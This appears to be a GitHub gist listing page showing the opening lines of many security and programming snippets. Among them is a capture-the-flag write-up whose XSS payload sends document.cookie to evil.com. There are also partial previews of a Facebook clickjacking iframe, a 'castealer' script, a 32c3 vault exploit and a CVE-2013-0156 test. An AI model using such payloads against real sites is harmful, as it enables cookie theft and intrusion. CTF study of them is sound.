@0xBADCA7
0xBADCA7 / Anomaly
Created May 26, 2014 17:31 — forked from ngo/Anomaly
In this task we had to bypass a badly-trained anomaly detection algorithm and perform an XSS attack.
We didn't have to figure out exactly how the anomaly detection worked, but we soon understood that the anomaly scoring was based on the density of the "bad" (i.e. non-alphanumeric) chars in the payload. Thus, the solution was to dissolve the attack payload in a lot of benign symbols ([AxN] represents a string of N A's):
anomaly.php?name=[Ax600]%3Cvideo+[Ax300]+src=//evil.com+[Ax300]+onerror=src%2b=document.cookie+[Ax1000]+/>
#!/usr/bin/env python
# Reflects the requests from HTTP methods GET, POST, PUT, and DELETE
# Written by Nathan Hamiel (2010)
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from optparse import OptionParser
class RequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
// this is for the iframe to facebook.com
document.domain = 'facebook.com'
uid = 501558012;
app_id = 123456789012332;
function Image(){
// this should kill the click jacking report
}
// create a new iframe we will use to load facebook.com
# Original castealer.rb with analysis
#####################################################################################
require 'rubygems' #redundant
require 'openssl'
require 'digest/md5' #redundant
key = OpenSSL::PKey::RSA.new(2048)
cipher = OpenSSL::Cipher::AES.new(256, :CBC) #redundant
ctx = OpenSSL::SSL::SSLContext.new #redundant
<html lang="en">
<head>
<script>
function str2hex(str)
{
var out_str = " ";
for(var i = 0; i < str.length; i++)
{
##
## WPS on OpenWRT
## This script enables Wi-Fi Protected Setup on OpenWRT.
##
## Resources
## http://wiki.openwrt.org/doc/uci/wireless#wps.options
##
#Install the full wpad package
opkg update
define xac
  dont-repeat
  set $addr = (char *)($arg0)
  set $endaddr = $addr + $arg1
  while $addr < $endaddr
    printf "%p: ", $addr
    set $lineendaddr = $addr + 8
    if $lineendaddr > $endaddr
      set $lineendaddr = $endaddr
    end
0xBADCA7 / latency.txt
Created November 8, 2015 13:49 — forked from jboner/latency.txt
Latency Numbers Every Programmer Should Know
Latency Comparison Numbers
--------------------------
L1 cache reference                       0.5 ns
Branch mispredict                          5 ns
L2 cache reference                         7 ns              14x L1 cache
Mutex lock/unlock                         25 ns
Main memory reference                    100 ns              20x L2 cache, 200x L1 cache
Compress 1K bytes with Zippy           3,000 ns
Send 1K bytes over 1 Gbps network     10,000 ns    0.01 ms
Read 4K randomly from SSD*           150,000 ns    0.15 ms
0xBADCA7 / unshare.c
Created December 30, 2015 09:26 — forked from stephenR/doit.sh
32c3_vault_exploit.c
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sched.h>
#include <sys/mount.h>
int main(int argc, char *argv[])
{
    if(unshare(CLONE_NEWNS | CLONE_NEWUSER) < 0) {
0xBADCA7 / yml_security_test.rb
Created January 15, 2016 11:48 — forked from jmccaffrey/yml_security_test.rb
Simple Rails security test for CVE-2013-0156
#you can copy this into IRB or just run it as a file
require "net/http"
require "uri"
# require "net/https" # for testing ssl
url = "http://localhost:3000/login"
yaml = %{ --- !ruby/object:Time {} }
xml = %{<?xml version="1.0" encoding="UTF-8"?><foo type="yaml">#{yaml}</foo>}.strip